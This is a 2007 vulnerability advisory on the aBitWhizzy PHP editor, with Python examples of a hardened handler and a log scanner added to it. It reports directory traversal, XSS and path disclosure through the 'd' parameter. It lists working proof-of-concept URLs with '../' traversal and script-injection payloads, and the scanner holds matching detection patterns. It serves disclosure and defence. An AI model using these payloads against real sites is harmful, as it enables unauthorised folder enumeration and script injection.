aBitWhizzy traversal folder enumeration and XSS

Tuesday, March 27, 2007
################################################
aBitWhizzy traversal folder enumeration and XSS
vendor url: http://www.unverse.net/abitwhizzy/
Advisory:http://lostmon.blogspot.com/2007/03/abitwhizzy-traversal-folder-enumeration.html
vendor notify:YES exploit include:YES
OSVDB ID:34505,34506,34507,34508
Secunia:SA24679
FrSIRT:FrSIRT/ADV-2007-1136
BID:23167
################################################

aBitWhizzy is a PHP script that uses whizzywig.js to create
and edit web pages through a WYSIWYG interface, right through
your browser. Now your site can be updated by people with no
knowledge of HTML, FTP or AIG (Abbreviations In General).

aBitWhizzy contains a flaw that allows a remote user to enumerate
arbitrary folders through directory traversal. The flaw exists
because the application does not validate the 'd' parameter passed
to the 'whizzylink.php', 'whizzypic.php', 'whizzery/whizzypic.php'
and 'whizzery/whizzylink.php' scripts. A remote user can craft a
URL containing '../' directory traversal sequences to view the
folder structure of the target system with the privileges of the
web server process.

The same input validation error also permits cross-site scripting
attacks and full path disclosure: the unvalidated 'd' value is
reflected into the page, and a malformed value (a single quote is
enough) makes the script report the full filesystem path in its
error output.
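As an added illustration, not code from aBitWhizzy (whose source is not reproduced here), the following Python models the flawed handling of 'd' next to a hardened version. The folder layout, the function names and the warning text are assumptions; the real scripts are PHP, where the same fix applies (realpath(), a prefix test against the allowed base folder, htmlspecialchars() on output, and error messages that do not include the path).

```python
import html
import os
import posixpath
import tempfile

# Constructed sandbox (assumption: the real application's folder names
# differ): a picture folder the script may list, and a folder outside
# it that must stay invisible.
ROOT = tempfile.mkdtemp()
PICS = os.path.join(ROOT, "htdocs", "abitwhizzy", "pics")
SECRET = os.path.join(ROOT, "secret")
os.makedirs(PICS)
os.makedirs(SECRET)
open(os.path.join(PICS, "logo.gif"), "w").close()
open(os.path.join(SECRET, "passwords.txt"), "w").close()


def vulnerable_listing(d):
    """Model of the reported flaw (assumed structure, not aBitWhizzy code):
    'd' is joined to the base folder unchecked, a failed open leaks the
    absolute path in the warning, and the raw value is reflected into HTML."""
    target = os.path.join(PICS, d)          # "../.." walks out of PICS
    page = ""
    try:
        entries = sorted(os.listdir(target))
    except OSError:
        entries = []
        # PHP-style warning text: full path disclosure
        page += "Warning: opendir(%s): failed to open dir<br>" % target
    page += '<a href="?d=%s">%s</a>' % (d, d)   # unescaped: XSS
    return entries, page


class BadPath(ValueError):
    """Raised when 'd' tries to leave the picture folder."""


def safe_listing(d):
    """Hardened model: normalise, confine to PICS, escape before output,
    and never put a filesystem path into an error message."""
    if "\x00" in d:
        raise BadPath("NUL byte in d")
    # Normalise the untrusted segment as a string first ("\\" treated as "/").
    rel = posixpath.normpath(d.replace("\\", "/")) if d else "."
    if rel.startswith("/") or rel == ".." or rel.startswith("../"):
        raise BadPath("d escapes the picture folder")
    # Then resolve on disk and re-check the prefix, which also catches symlinks.
    base = os.path.realpath(PICS)
    target = os.path.realpath(os.path.join(base, rel))
    if target != base and not target.startswith(base + os.sep):
        raise BadPath("d escapes the picture folder")
    safe = html.escape(rel, quote=True)
    if not os.path.isdir(target):
        return [], "Folder not found: %s" % safe     # generic, no path leak
    entries = sorted(os.listdir(target))
    return entries, '<a href="?d=%s">%s</a>' % (safe, safe)


def is_rejected(d):
    """True when the hardened handler refuses the value outright."""
    try:
        safe_listing(d)
        return False
    except BadPath:
        return True
```

The string-level check on the normalised value rejects both forms seen in the advisory's URLs ('../...' and '/../...'); the realpath() prefix test is kept as a second line of defence so a symlink inside the picture folder cannot point outside it.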

###################
VERSIONS
###################

Unknown version of aBitWhizzy

##################
SOLUTION
##################

No solution was available at the time of publication.

######################
TIMELINE
######################

discovered:25-03-2007
vendor notify:25-03-2007
vendor response:---------
Private Disclosure:25-03-2007
public disclosure:27-03-2007

#######################
Examples
#######################

Path disclosure:

http://localhost/abitwhizzy/whizzylink.php?d='
http://localhost/abitwhizzy/whizzypic.php?d='
http://localhost/abitwhizzy/whizzery/whizzypic.php?d='
http://localhost/abitwhizzy/whizzery/whizzylink.php?d='

Folder enumeration:

http://localhost/abitwhizzy/whizzylink.php?d=../../../../../../../Documents%20and%20Settings

http://localhost/abitwhizzy/whizzypic.php?d=../../../../../../../Documents%20and%20Settings

http://localhost/abitwhizzy/whizzery/whizzypic.php?d=/../../../../../../../Documents%20and%20Settings

http://localhost/abitwhizzy/whizzery/whizzylink.php?d=/../../../../../../../Documents%20and%20Settings


Cross-site scripting:

http://localhost/abitwhizzy/whizzery/whizzypic.php?d=/../../../../../../../Documents%20and%20Settings"><SCRIPT>alert('XSS')</SCRIPT>

http://localhost/abitwhizzy/whizzery/whizzylink.php?d=/../../../../../../../Documents%20and%20Settings"><SCRIPT>alert('XSS')</SCRIPT>

http://localhost/abitwhizzy/whizzypic.php?d=../../../../../../../Documents%20and%20Settings"><SCRIPT>alert('XSS')</SCRIPT>

http://localhost/abitwhizzy/whizzylink.php?d=../../../../../../../Documents%20and%20Settings"><SCRIPT>alert('XSS')</SCRIPT>
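For a site that cannot patch, the probes above are easy to spot in the web server access log. The following Python is an added example, not part of the advisory: it parses constructed Apache combined-log lines that mirror the URLs listed above, restricts itself to the four affected scripts, and flags a 'd' value that carries a traversal sequence, markup, or the lone quote used for the path disclosure probe. The log lines, IP addresses and field names are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed Apache combined-log lines (not real traffic). Lines 2 to 5
# mirror the advisory's probe URLs; lines 1 and 6 are there to show that
# benign values and non-affected scripts are left alone.
SAMPLE_LOG = """\
192.0.2.10 - - [27/Mar/2007:10:00:01 +0000] "GET /abitwhizzy/whizzylink.php?d=pics HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.10 - - [27/Mar/2007:10:00:02 +0000] "GET /abitwhizzy/whizzylink.php?d=' HTTP/1.1" 200 640 "-" "Mozilla/5.0"
192.0.2.10 - - [27/Mar/2007:10:00:03 +0000] "GET /abitwhizzy/whizzypic.php?d=../../../../../../../Documents%20and%20Settings HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.10 - - [27/Mar/2007:10:00:04 +0000] "GET /abitwhizzy/whizzery/whizzylink.php?d=/../../../../../../../Documents%20and%20Settings HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.10 - - [27/Mar/2007:10:00:05 +0000] "GET /abitwhizzy/whizzery/whizzypic.php?d=%2F..%2F..%2FDocuments%2520and%2520Settings%22%3E%3CSCRIPT%3Ealert('XSS')%3C/SCRIPT%3E HTTP/1.1" 200 900 "-" "Mozilla/5.0"
198.51.100.7 - - [27/Mar/2007:10:00:06 +0000] "GET /abitwhizzy/index.php?d=../ HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

# Apache combined log: client, identd, user, [timestamp], "request", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

# The scripts named in the advisory (basename only; both locations match).
AFFECTED = ("whizzylink.php", "whizzypic.php")


def classify(d):
    """Return the set of indicators found in one decoded 'd' value."""
    # parse_qs already decoded once; decode again so double-encoded
    # sequences such as %252e%252e%252f are caught as well.
    v = unquote(d).lower()
    reasons = set()
    if "../" in v or "..\\" in v:
        reasons.add("traversal")
    if "<" in v or "javascript:" in v:
        reasons.add("xss")
    if v.strip() in ("'", '"'):
        reasons.add("fpd-probe")    # the d=' path disclosure probe
    return reasons


def scan(log_text):
    """Scan combined-log text; return one finding per suspicious 'd' value."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                       # not a combined-log line
        parts = urlsplit(m.group("url"))
        if parts.path.rsplit("/", 1)[-1] not in AFFECTED:
            continue                       # other scripts are out of scope here
        for d in parse_qs(parts.query, keep_blank_values=True).get("d", []):
            reasons = classify(d)
            if reasons:
                findings.append({
                    "ip": m.group("ip"),
                    "time": m.group("ts"),
                    "path": parts.path,
                    "d": d,
                    "reasons": sorted(reasons),
                })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["time"], f["ip"], f["path"], f["reasons"], repr(f["d"]))
```

Matching on the decoded value rather than the raw request line is what lets the fifth line, where the attacker URL-encoded the slashes and the quote, fall into the same bucket as the plain probes.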


########################### €nd ###################################

Thanks to estrella, I love you lots ;P
Thanks to all the Lostmon's Group Team

--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what moves the mind....